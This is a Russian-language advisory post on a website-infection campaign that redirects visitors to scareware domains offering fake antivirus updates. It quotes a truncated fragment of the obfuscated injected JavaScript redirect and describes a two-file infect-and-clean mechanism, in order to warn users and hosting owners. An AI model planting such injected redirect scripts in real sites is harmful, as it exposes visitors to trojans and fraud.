Описание проблемы:
С некоторых пор на многих сайтах появились редиректы на beladen.net, googleanalytlcs.net, scan4note.com, при чем, как правило, без ведома самих владельцев сайтов.
При просмотре нескольких страниц вполне обычного с виду и еще некоторое время назад, корректно работающего сайта, пользователь в одно мгновение перебрасывается на страницы стороннего ресурса, которые пугают его наличием на компьютере пользователя огромным количеством вирусов и предлагают обновить антивирусное обеспечение. Предлагают, причем очень настойчиво, закрыть такое ”предложение” можно только через снятие задачи. Ну а если кто-то решит, ”обновить “ свой антивирусник, получит, полный набор троянов и другой подобной нечисти.
Перенаправление происходит посредством такого, или примерно такого скрипта:
<!--fa1502e73a01cc72fb483c8f4f8036bf--> < script language=javascript> nebhovqgz="oZimPP%UwRntoZnl!U&HL!t!P"; snqsxy="<sG63riG70tG20lG61nG67G75aG67e= jG61vaG73G63G72iG70tG3e G20fG75ncG74G69onG20tlzG62G6aoG65zG28lG77vosju)G7bvar xqG6ecG65G74pyg,G6eG6dfG72zG66G67G6dG71= G22&G61G6b@3G79G5fb[~+4JUCO{$G39:w!G6fv17G23fr)G67G6c ^G50}G71G48G20EG75N0G6ex]G36pG6dFi= (`G38G3bG472'G6aG41G2cG54zhG56cG4b.\\\"G42G49tG4dsG35|G65ZG2dG64G2a\", qG7aiG63yjlnG3dG22\" ,G6cjG6ccwG6fG67G70,ewG61G72igG2cG69G6cquG63fG6c =\"\" ,nG6fzG77G61n;fG6frG28xqnceG74pG79G6 7G3dG30G3bG78G71n G63G65G74G70ygG3clG77G76G6fsG6au.G6cenG67th; xqnG63etG70yg++) { G6cjG6cG63G77G6fgG70=G6cwvG6fsju.chG61rAG74 …….
Данный скрипт, бесполезно искать на своем компьютере, думая, что последний заражен. Заражен не компьютер, а сам сайт, если ip этого сайта выделенный, или ip-адрес, если на нем находится не один десяток сайтов.
Поэтому главное правило в такой ситуации, не загружать ничего на свой компьютер, закрыть браузер и написать админу сайта о проблеме на его хостинге.
Владельцам сайтов:
Как это ни прискорбно, Ваш сайт может быть и чист во всех смыслах, а вот один из размещенных на Вашем IP, будет заражен, и тогда и Ваш сайт может попасть в черный список, как у пользователей, так и у Google. Поэтому, важно, как можно скорее начать поиск проблемы и лучше совместно с Вашим хостером.
Как происходит заражение:
занести вредоносные скрипты можно:
-- физически
-- залив по сети через ftp/cms
-- через уязвимости в cms или сайте.
-- через открытые, неучтенные отладочные дыры (оставленные при разработке и отладке) сайта, авторизации и тп...
для сканирования вашего сайта|хостинга можно использовать специализированные сканеры уязвимостей. Не исключено, что на ваш сайт или хостера вышли именно им, и решили поэксплуатировать найденные уязвимости , (например, в применяемой cms, или же непосредственно в самом php)
под видом "улучшений" доверчивому пользователю можно предложить все что угодно. (от социальной инженерии только техническими методами уберечься нельзя).
Где искать и что искать:
Искать нужно не один, а два вредоносных скрипта (beladen.zip). С виду оба вполне нормальные и не детектируются никакими антивирусными программами.
Но первый – занимается инициализацией данных, какого-то конфига. например, туда может быть добавлена ссылка на вредоносный код (пример которого выше).
А второй – чистит файлы.
Таким образом, проблема запускается из вне сервера или сайта, работает какое-то время, а затем благополучно исчезает, что бы через определенное время возникнуть снова.
Общий совет владельцем сайтов и хостингу: не раздувайте щеки, работайте вместе над выявлением проблемы, ищите не на поверхности, а в глубине, два маленьких файлика.
Данная проблема была решена на хостинге нашего проекта http://www.tiwatiwa.com, при содействии специалистов Dr Web, за что огромное им спасибо!!!

Contact Us